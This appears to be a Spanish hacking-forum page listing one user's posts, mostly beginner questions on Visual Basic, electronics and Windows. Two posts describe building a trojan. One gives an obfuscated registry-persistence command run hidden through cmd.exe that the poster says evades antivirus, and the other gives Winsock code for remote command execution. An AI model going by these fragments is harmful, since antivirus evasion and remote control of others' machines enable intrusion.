elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 2 [3]
21  Programación / Programación Visual Basic / Borrar de un texbox en: 7 Junio 2007, 21:30 pm
wenas, os quiero acer una preguntilla, como puedo borrar desde codigo el contenido de un texbox asta un caracter deeterminado?

por ejemplo si en un texbox tegno lalalal-lalalkekkeke

pues al darle al boton me borre asta el guion, kedando solo lalalal

o si me decis de que manera puedo buscarlo ya me apaño yo, pero es que no se como buscarlo

gracias
22  Programación / Programación Visual Basic / no me cierra el cmd en: 31 Mayo 2007, 21:57 pm
wenas, os comento, en mi troyano la unica forma de que el nod no me lo detecte al agregarlo al registro es esta:

Citar
reg = encrypt("YLN'HKK'ORL`fSVJHSfTHJOPULcZvm{~hylcTpjyvzvm{c^pukv~zcJ|yylu{]lyzpvucY|uc'6}'j{mjtvu'6{'YLNfZa'6k',~pukpy,cZ€z{lt:9cj{mjtvu5ll")
Shell "cmd.exe /c " & reg & "" & vbCrLf & "y", vbHide

el problema esta en que si la calve existe se queda el proceso del cmd corriendo, ya que pide confirmacion Y/N y se que da ay el proceso. mi duda es de que manera puedo hacer que compruebe si existe esa clave o que cuando pida confirmacion Y/N mande una Y por si acaso.

Gracias.
23  Programación / Programación Visual Basic / ejecutar archivos remotos en: 24 Mayo 2007, 22:21 pm
wenas, estoy intentando acer un troyano (el primero que ago) y a la vez intento aprender sobre el winsock. para mi el mejor manual es la practica con un poco de teoria.

weno pos os comecto. la manera que ago yo para enviar comandos es la siguiente:

en el cliente:

Private Sub cmdAbrir_click()
ws.sendata "abrircd"
End Sub

en el server:

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
On Error GoTo error
Dim datos As String
ws.GetData datos
If datos = "abrircd" Then ret = mciSendString("set CDAudio door open", returnstring, 127, 0)
End Sub

Esta es la manera que uso yo para enviar comandos, se que no es la mejor, pero DE MOMENTO a mi me sirve asi.

aora la pregunta es como enviar al servidor el contenido de un textbox y que el servidor ejecute el programa que ay en ese textbox.

en el cliente supongo que seria algo asi:

ws.sendata Text2.text

pero en el servidor no se como acer para que me muestre el contenido del textbox. con eso yo ya sabria apañarme. si podeis ponerme algun enlace o algo que me explique un poco como acer eso os lo agradecere un monton.

gracias
24  Programación / Programación Visual Basic / Problema con MakeSkin en: 24 Abril 2007, 23:04 pm
Hola, os comento, estoy haciendo un programa y para darle un aspecto mas majo, e usado el codigo de recortar un form segun su color de fondo que publico MadAntrax
http://foro.elhacker.net/index.php/topic,161249.0.html

El codigo funciona bien, pero no se por que me sale el borde del programa en negro:

Que puedo hacer para solucionar eso y que no me salga el borde?

Gracias
25  Programación / Programación Visual Basic / Duda sobre Open en: 13 Septiembre 2006, 20:30 pm
weno pos estoy haciendo unos ejercicios y uno de ellos se trata de meter un texto en un documento de texto que la funcion Open debe de crear.

yo hago lo siguiente:

Open ("archivo.txt") For Output As #1
Print #1, "Me as escrito desde VB"
Close #1

pero no se por que no me crea el archivo , o por lo menos en la carpeta del proyecto no esta.

Que hago masl??

aver si me ayudais

THXs


EDIT:
_________________________________________

Weno me acabo de dar cuanta de una cosa.
Si que crea el archivo, pero en vez de crearlo en la carpeta del proyecto me lo crea en:

C:\Archivos de programa\Microsoft Visual Studio\VB98

Por que lo crea hay en vez de en la carpeta del proyecto?
o en su defecto como puedo poner una ruta para qu elo cree ay ?

THXAS
26  Informática / Electrónica / Pasar 12 v a 9 v en: 13 Marzo 2006, 10:54 am
hola, vereis necesito sacar 9 voltios de una bateria que saca 12v. E leido por internet que haciendo esto:



Sacas 3 Voltios. Son un diodo zener de 3.3v 1 W y una resistencia de 1k. Mi pregunta es: Si sustituyo el diodo por uno de 9 (no se si abra), y la resistencia por una de 3 k conseguiria los 9 voltios? Es que necesito los 9 voltios para un aparato que funciona con una pila de 9, y teniendo la bateria lo conecto a ella y me ahorraria tener que estar cambiando la pila.

Gracias
27  Informática / Electrónica / Puerto com a puerto usb en: 17 Enero 2006, 14:30 pm
ola wenas me gustaria saberr si puedo pasar un puerto com a un puerto usb:

me explico bien,,necesito conectar mi pendrive a un ordenador que no tiene usb y keria saber si puedo acerme un cable com-usb para ello y si es asi un eskema o algo

gracias
28  Sistemas Operativos / Windows / formatear un pendrive en: 27 Octubre 2005, 13:57 pm
weno pos no se por que razon al formatear windows, se me a formateao tb la memoria portatil, y aora no me deja formatearla, que puedo acer? de que manera le puedo volver a poner el sistema de archivos que tenia? creo que era fat
29  Media / Diseño Gráfico / como acer un salvapantallas? en: 10 Marzo 2005, 06:49 am
ola me gustaria saber como acer un salvapantallas a partir de una animacion flas que e exo
30  Media / Diseño Gráfico / swf como fondo de escritorio en: 10 Marzo 2005, 00:53 am
wenas, keria saber si puedo poner una animacion swf como fondo de escritorio, pero sin pasarla agif, por que sino pierde muxa calidad.

Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines